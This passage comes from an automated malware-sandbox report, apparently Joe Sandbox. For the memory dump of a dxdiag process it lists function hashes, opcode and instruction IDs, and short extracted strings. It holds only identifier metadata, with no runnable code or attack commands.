                                                                                                                • Instruction ID: 4159aafd9c10dcdb92f5b7ab8577220b838cb96e890b31dd2f5e1bbf81f70fed
                                                                                                                • Opcode Fuzzy Hash: 6415562d6c1008e6fe1d99e2b67bdb73ebf9c9cca06134cedbe07d6db5d92b51
                                                                                                                • Instruction Fuzzy Hash: 3DC12374548341CBD7349F24D891BEB73A1EF96314F044A3DE4D98B3A1EB389981CB9A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: X\j_$d$ztbk
                                                                                                                • API String ID: 0-161409437
                                                                                                                • Opcode ID: 178e0c69511cf786b98128b254f0426a957d5df6ad6af87ce70e9a0989f1dd82
                                                                                                                • Instruction ID: c647836b6919da90344013ba879caa2c0c0a118e64d05fdf5bbca9858e4c4854
                                                                                                                • Opcode Fuzzy Hash: 178e0c69511cf786b98128b254f0426a957d5df6ad6af87ce70e9a0989f1dd82
                                                                                                                • Instruction Fuzzy Hash: 7DB146712047918FD329CF29C450723FBE2AF86300F69C69EC8D68B796C678E802CB55
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: X\j_$d$ztbk
                                                                                                                • API String ID: 0-161409437
                                                                                                                • Opcode ID: c138dd2b7c66af969763d4e987df7e41070ed8ccd11516e73ecb22322106a9ee
                                                                                                                • Instruction ID: 63ec9625d8e1e38da1926b311d6272fb904936b9087af233feddb224084f3342
                                                                                                                • Opcode Fuzzy Hash: c138dd2b7c66af969763d4e987df7e41070ed8ccd11516e73ecb22322106a9ee
                                                                                                                • Instruction Fuzzy Hash: A9A158712047918FD329CF29C450722FBE2AF86304F69C69EC9D68B792C778D812CB55
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: X\j_$d$ztbk
                                                                                                                • API String ID: 0-161409437
                                                                                                                • Opcode ID: 14fc744518a8a4fa68d9e00823f089d1af0127733397b98013bd6eb39e02983f
                                                                                                                • Instruction ID: 69c4823cc23e329729b65d6cd6aa0dd4aae8d762435b1c1a1192b9f4453f2a0f
                                                                                                                • Opcode Fuzzy Hash: 14fc744518a8a4fa68d9e00823f089d1af0127733397b98013bd6eb39e02983f
                                                                                                                • Instruction Fuzzy Hash: D6A148712047918FD329CF29C490722FBE2AF86304F69C69EC9D68B792C779D842CB55
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: X\j_$d$ztbk
                                                                                                                • API String ID: 0-161409437
                                                                                                                • Opcode ID: b044eee7a262e571ea12573e6cf26b9f4d54e30ac2eb5059c67a4872f77a546c
                                                                                                                • Instruction ID: b77578477651018fdeaac84c335eda1cf7dbe90ebbcab35e646ae95f6ad1400d
                                                                                                                • Opcode Fuzzy Hash: b044eee7a262e571ea12573e6cf26b9f4d54e30ac2eb5059c67a4872f77a546c
                                                                                                                • Instruction Fuzzy Hash: 17A168712047918FD325CF29C490722FBE2AF96300F6D869EC4D68B786C778D802CB65
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 3zx[$qzx[$@B
                                                                                                                • API String ID: 0-149612330
                                                                                                                • Opcode ID: 17b5d7aecd68ee84dfd04b24f533ecaaf5dbf0cb7ca230442a63f74c25e47d9e
                                                                                                                • Instruction ID: 9e4b87dcb06e457d0f9d11912b9a92467ef5426d1500ae2c30e3006a4d20d98e
                                                                                                                • Opcode Fuzzy Hash: 17b5d7aecd68ee84dfd04b24f533ecaaf5dbf0cb7ca230442a63f74c25e47d9e
                                                                                                                • Instruction Fuzzy Hash: 9AA14471A043509FE724CF68CD41BAEBBB1FB85700F0541AEE905AF392D7759902CB95
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: )LWt$VwWy$su
                                                                                                                • API String ID: 0-3217031312
                                                                                                                • Opcode ID: df3abb5220737b9bf04c5bae9f03c91a1aa6ed068ceafdad675784e96d291a5e
                                                                                                                • Instruction ID: 30f66bfa02c826f192fa745d1aa3d8111df13ee3ec6becbcaa5c5be03c67a3cc
                                                                                                                • Opcode Fuzzy Hash: df3abb5220737b9bf04c5bae9f03c91a1aa6ed068ceafdad675784e96d291a5e
                                                                                                                • Instruction Fuzzy Hash: 44510FB0201711ABD3248F21C495722BBB1BB19308F24969CD1861FB96D3BBE457CF88
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4l$KA
                                                                                                                • API String ID: 0-2227922710
                                                                                                                • Opcode ID: ece183665e9cd0250bda4baa08dea94051610fd0a3949e522ee096408b33f542
                                                                                                                • Instruction ID: 7d394960c13b993b07ff0ec63b5c916a70d7b749b6eef6e0c3313fbac85af60e
                                                                                                                • Opcode Fuzzy Hash: ece183665e9cd0250bda4baa08dea94051610fd0a3949e522ee096408b33f542
                                                                                                                • Instruction Fuzzy Hash: 55421475608301CBE714DF24DC42ABB73A1FBC6314F19853EE58587391E7799885CB8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0$8
                                                                                                                • API String ID: 0-46163386
                                                                                                                • Opcode ID: 4d31846ea3cd1676bcc8b5810d49a0c429a9bcd0f11c617c85cd4880b3a76c6f
                                                                                                                • Instruction ID: 6370abf147319fefda308a2038e70a02aa4510a212c48b2156ced0c66922abe4
                                                                                                                • Opcode Fuzzy Hash: 4d31846ea3cd1676bcc8b5810d49a0c429a9bcd0f11c617c85cd4880b3a76c6f
                                                                                                                • Instruction Fuzzy Hash: A27224B16083419FD710CF18C880B9BBBE1AF94354F04892EF9999B392D379D958CF96
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: f$g
                                                                                                                • API String ID: 2994545307-2729975458
                                                                                                                • Opcode ID: 4cd79b717976fae15cbbecf2b362b45576482f5731d1ef7c12f67a79aa4caa16
                                                                                                                • Instruction ID: c9b2282577dd7928e87c6e7aed450861025ac80ca66e243a85fcddc34fbf70c2
                                                                                                                • Opcode Fuzzy Hash: 4cd79b717976fae15cbbecf2b362b45576482f5731d1ef7c12f67a79aa4caa16
                                                                                                                • Instruction Fuzzy Hash: 1F3204756083419FD714CF28C880A2FBBE2ABC9314F299A2EE5D597391CB75DC41CB4A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: dZB$r`B
                                                                                                                • API String ID: 0-3904460924
                                                                                                                • Opcode ID: 0a9eee2e05ad593b87d1a35673dacdee6d4f1f71470903015ce88b7b45ba2a2a
                                                                                                                • Instruction ID: cf11a58a00d61d500a6140a78dc3910c7a963cd34266b10506d1b50124c2a4e1
                                                                                                                • Opcode Fuzzy Hash: 0a9eee2e05ad593b87d1a35673dacdee6d4f1f71470903015ce88b7b45ba2a2a
                                                                                                                • Instruction Fuzzy Hash: D11245B460C3918BD710CF25E89126FBBE0EF96308F54896DE4C69B382D778D905CB5A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ofA$
                                                                                                                • API String ID: 0-1552613143
                                                                                                                • Opcode ID: e826f98870c836bfb8e0ea51c571821792422a0c5e161fdc289a0df1255da1a3
                                                                                                                • Instruction ID: 2c823ed54a2d2150a2d94358e89aa5dd56cf77a80caffb394fd748b267586704
                                                                                                                • Opcode Fuzzy Hash: e826f98870c836bfb8e0ea51c571821792422a0c5e161fdc289a0df1255da1a3
                                                                                                                • Instruction Fuzzy Hash: E51237756083509FD724CF28DC917AF77E2EB86314F154A3DE48A87291DB39D841CB8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: R9B$}~
                                                                                                                • API String ID: 0-2143352738
                                                                                                                • Opcode ID: a20bea4d2debd35d1aa5696fec164c130505b818f13da4c4dcc747a5536a5dc6
                                                                                                                • Instruction ID: c67b400d593570aea51a5883cfaab9404424982819ae66ceb36794941c5778d7
                                                                                                                • Opcode Fuzzy Hash: a20bea4d2debd35d1aa5696fec164c130505b818f13da4c4dcc747a5536a5dc6
                                                                                                                • Instruction Fuzzy Hash: BEF12276A18321DBC724DF24D8411ABB3F2FF85742F88896DE48597260E73C9B45CB49
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: N%&'$ij
                                                                                                                • API String ID: 0-2336341608
                                                                                                                • Opcode ID: 88f5ead50482a0d5692fe065ff7ab871ef9c8578c732ac1c41b12b274cf9b7f8
                                                                                                                • Instruction ID: 3ec1164c08b8df8f5ad239da4b50aaa16cb908530bffe58995966572d7d06e5a
                                                                                                                • Opcode Fuzzy Hash: 88f5ead50482a0d5692fe065ff7ab871ef9c8578c732ac1c41b12b274cf9b7f8
                                                                                                                • Instruction Fuzzy Hash: 63913375A483008BC714CF69CC913ABB7E2EFD9314F08C96DE8C68B385E7789585875A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: )$IEND
                                                                                                                • API String ID: 0-707183367
                                                                                                                • Opcode ID: 18bf37ad41109e80a1a09e8aa62cffcf334b86b9c7745820e439ec832c58c8b6
                                                                                                                • Instruction ID: 69784f994d522c806696069fb0bc0fba4b22834945d23ce78d0c5b6699577816
                                                                                                                • Opcode Fuzzy Hash: 18bf37ad41109e80a1a09e8aa62cffcf334b86b9c7745820e439ec832c58c8b6
                                                                                                                • Instruction Fuzzy Hash: F2D191B19083449FD710CF15D841B5FBBE4AB94308F14492EFA99AB3C2D779E908CB96
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ./$h3T5
                                                                                                                • API String ID: 0-2425256910
                                                                                                                • Opcode ID: a2b2180c65d7394546b7c1e0cf6cc2ed789f617f73c682bd2d84fc2d095af9de
                                                                                                                • Instruction ID: 8875d4901756c4b216268357a0ac996a12432350b8b0083aa304c3f513ba26e0
                                                                                                                • Opcode Fuzzy Hash: a2b2180c65d7394546b7c1e0cf6cc2ed789f617f73c682bd2d84fc2d095af9de
                                                                                                                • Instruction Fuzzy Hash: EA7114B651C3409AC718DF24CC9117BB7B2EFD5304F19962DE89567391EB38860AC78D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: +
                                                                                                                • API String ID: 2994545307-2126386893
                                                                                                                • Opcode ID: e49cc565bb25ea712ded7a77cb7fabab62f070ab26babbd63597e6b6ddc6b1e9
                                                                                                                • Instruction ID: 1a842e94016ed2d8c532f852bc49d7d4a1e2a2dd1db2aad469a581af37c970af
                                                                                                                • Opcode Fuzzy Hash: e49cc565bb25ea712ded7a77cb7fabab62f070ab26babbd63597e6b6ddc6b1e9
                                                                                                                • Instruction Fuzzy Hash: C9924EB1604B408FD324DF38C5953ABBBE2AB95314F18893ED4EB873C2DA78A545C746
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: o]^
                                                                                                                • API String ID: 0-3943879297
                                                                                                                • Opcode ID: e60bd4a8b9da6522f1b3359eba3995bbb3ba7a4471dfa0ff8ca762107fd0de44
                                                                                                                • Instruction ID: 4669969d7b71f7d68a9b592d0a4a540a5b8527d65a8744ebe538e10e24e07286
                                                                                                                • Opcode Fuzzy Hash: e60bd4a8b9da6522f1b3359eba3995bbb3ba7a4471dfa0ff8ca762107fd0de44
                                                                                                                • Instruction Fuzzy Hash: 58B16C72B083205BD714DB24E89277BB3A1EFE1354F59842EE88557391E63CE805C39A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: q
                                                                                                                • API String ID: 0-1973602202
                                                                                                                • Opcode ID: 3144f0c7d77c94f0b15253ad0cdaa548fa628ab49627c29bc90b5f25244d2502
                                                                                                                • Instruction ID: b69d45c65629a181d3394273b162446badd9582a993c74671e4135a58d3492d1
                                                                                                                • Opcode Fuzzy Hash: 3144f0c7d77c94f0b15253ad0cdaa548fa628ab49627c29bc90b5f25244d2502
                                                                                                                • Instruction Fuzzy Hash: 8BC10075A583108BC7248F28CC913ABB3F1EF96314F48992DE8C59B394E778D944C78A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: {B
                                                                                                                • API String ID: 0-2955416605
                                                                                                                • Opcode ID: b0bd08c29f9365885b933f1cf599b0cb6fa5fdb634cbb513a89aaee83ecc68c5
                                                                                                                • Instruction ID: 125d85a474e2c54c7edf7e8372bc309e0328607fb292080dea6794c80479f12b
                                                                                                                • Opcode Fuzzy Hash: b0bd08c29f9365885b933f1cf599b0cb6fa5fdb634cbb513a89aaee83ecc68c5
                                                                                                                • Instruction Fuzzy Hash: C3A145B5A0C3508FD7108F28D89222BBBE1AF86304F54883EF5D58B352E638D905CB97
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,
                                                                                                                • API String ID: 0-3772416878
                                                                                                                • Opcode ID: f4f7a47380c80d9f1d47d0d0c507c35257674a6dd286f39611ef468fd00499a1
                                                                                                                • Instruction ID: 51a14242803ecae43574cd839083da134051b3b3a324024ad900f53de0fcc2f5
                                                                                                                • Opcode Fuzzy Hash: f4f7a47380c80d9f1d47d0d0c507c35257674a6dd286f39611ef468fd00499a1
                                                                                                                • Instruction Fuzzy Hash: C5B149712097819FD325CF18C88061BFBE0AFA9704F544E2DE5D997382D635EA18CBA7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: JR
                                                                                                                • API String ID: 0-3458893224
                                                                                                                • Opcode ID: f7ae3770ed4749ad032964f2c81e60ade692c3c1a8750135e5cb492e043d9f21
                                                                                                                • Instruction ID: 44b59cc75133df7a41eb2e69763ada4243d618a4e2d430adff5262eca57ed642
                                                                                                                • Opcode Fuzzy Hash: f7ae3770ed4749ad032964f2c81e60ade692c3c1a8750135e5cb492e043d9f21
                                                                                                                • Instruction Fuzzy Hash: 0E61C52128C3C19AC3118F7994A07A7FFE09FA3314F1849BDE8D45B382D379891AD766
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ~
                                                                                                                • API String ID: 0-1707062198
                                                                                                                • Opcode ID: da1ad588922710a023164653a75339d34dbf593a205ea83d969eb3b9ccb4115d
                                                                                                                • Instruction ID: 6fa54e92a4b9978c13d68c63913922f98e05887ce952ffb0b0acc6151ef16d97
                                                                                                                • Opcode Fuzzy Hash: da1ad588922710a023164653a75339d34dbf593a205ea83d969eb3b9ccb4115d
                                                                                                                • Instruction Fuzzy Hash: 04811972A442614FC721CE28CC9139BBB919B85324F19827EECB99B3D2D638DC46D7D1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: gfff
                                                                                                                • API String ID: 0-1553575800
                                                                                                                • Opcode ID: e937fccc05efa2ecf9c05215e5990dbb3af36eaf18178220cc255147cd05165b
                                                                                                                • Instruction ID: b635ffe6758fa563810d355454ed740eab1994e1762da840ca45afbcef432b43
                                                                                                                • Opcode Fuzzy Hash: e937fccc05efa2ecf9c05215e5990dbb3af36eaf18178220cc255147cd05165b
                                                                                                                • Instruction Fuzzy Hash: AF61D2B16083058BD354CF18C8417ABBBE6FBC9314F15892EE489D7392DB78D945CB8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: W
                                                                                                                • API String ID: 0-793274765
                                                                                                                • Opcode ID: 949d4f68b5a0f5e009217c52b19c5dd71c50b240281d9f5b5bf409637eb5aa83
                                                                                                                • Instruction ID: 1e5f2fd2993d5a5d00e1584304d987d2456e5e273d97887f4c8a7713582cd764
                                                                                                                • Opcode Fuzzy Hash: 949d4f68b5a0f5e009217c52b19c5dd71c50b240281d9f5b5bf409637eb5aa83
                                                                                                                • Instruction Fuzzy Hash: FE01D877B024018BC71CCF38C8A3565B7A3EB96215769627EC562DF3D9DE3498018648
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b5e5b76ba52c3424cd9b7fcdc2f1a91986ccf407eca0dfc2878058712d65e054
                                                                                                                • Instruction ID: f3d5467b55631bdaa724751aa9045b56e4334b6402e67d183f6a87da8050b689
                                                                                                                • Opcode Fuzzy Hash: b5e5b76ba52c3424cd9b7fcdc2f1a91986ccf407eca0dfc2878058712d65e054
                                                                                                                • Instruction Fuzzy Hash: D152C471608B408FD364DF38C5953A7BBE1AB55314F18893ED8EB837C2E639A509C746
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d126f66a0e66620eabdd7cd9048ccabb2a362495bcb1caefcf2ffaaa0a9a3f4a
                                                                                                                • Instruction ID: cba84eeb8f78e0ae709cb9e2e748fe6274e4b764df0cc893636221a17d4e6bb5
                                                                                                                • Opcode Fuzzy Hash: d126f66a0e66620eabdd7cd9048ccabb2a362495bcb1caefcf2ffaaa0a9a3f4a
                                                                                                                • Instruction Fuzzy Hash: 2452F1B0A08B849FE730DF24C4847A7BBE1AB51314F15883ED5E7167C2C37DA9958B1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cc4c0233347152bea9374f1e245860b134debedbd6707f992945391f7166038a
                                                                                                                • Instruction ID: 86af1cb4bafd0ed74008c60c32463ec180b14810afe3fc4f9a0b4589affe1339
                                                                                                                • Opcode Fuzzy Hash: cc4c0233347152bea9374f1e245860b134debedbd6707f992945391f7166038a
                                                                                                                • Instruction Fuzzy Hash: 476219B0508B819ED371CF3D8805786BFE5AB5A320F148A5EE4FAC7392D774A501CB66
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05d9facb0d4c79a7579644c66930578ddf1e6edfe5b96f5a7fc26d4a417109ca
                                                                                                                • Instruction ID: 1c54c97c46aa2ef6bdbd5d76da75d5e4d1013e71daecfc50a96a56d554505fa0
                                                                                                                • Opcode Fuzzy Hash: 05d9facb0d4c79a7579644c66930578ddf1e6edfe5b96f5a7fc26d4a417109ca
                                                                                                                • Instruction Fuzzy Hash: 6552F4715083459FCB14CF18C0806AABFE1BF89305F188A7EF8996B391D778E945CB89
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
                                                                                                                • Instruction ID: e3b42c420a0ab721274a946c9fa7eab4dab2f787d0bed5ea88cf2f50095341df
                                                                                                                • Opcode Fuzzy Hash: e146d9e79c543f870ee6916604a8e8036e439f7ac644d997363382936f2289b5
                                                                                                                • Instruction Fuzzy Hash: 5F22B332A087118BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7385D738B8518B47
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 71b1cecae46f736fb81e8164bc74a66928acdad7a3bbb41b8c7e87c625e2b1db
                                                                                                                • Instruction ID: cb804480fa9771f3decfe968603f1fa251b047b45c1119fa1a0aece904f71b93
                                                                                                                • Opcode Fuzzy Hash: 71b1cecae46f736fb81e8164bc74a66928acdad7a3bbb41b8c7e87c625e2b1db
                                                                                                                • Instruction Fuzzy Hash: C8322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f567d6d837b9d1cd09dbb14271fc336aa9119b96957633eaba47b69cb481c3c3
                                                                                                                • Instruction ID: 8de7fec0fbf75a066610e9e7739594f8429d2466b2c872ee27e4363637c8b379
                                                                                                                • Opcode Fuzzy Hash: f567d6d837b9d1cd09dbb14271fc336aa9119b96957633eaba47b69cb481c3c3
                                                                                                                • Instruction Fuzzy Hash: 9A22D3B5A08B408FD324DF38D4953ABBBE1AF55304F04893ED5EB87392E638A545CB46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 75d62604bc8ba10a3965eda64e96c0529ca78dc7befd1f69851b412b056e6d36
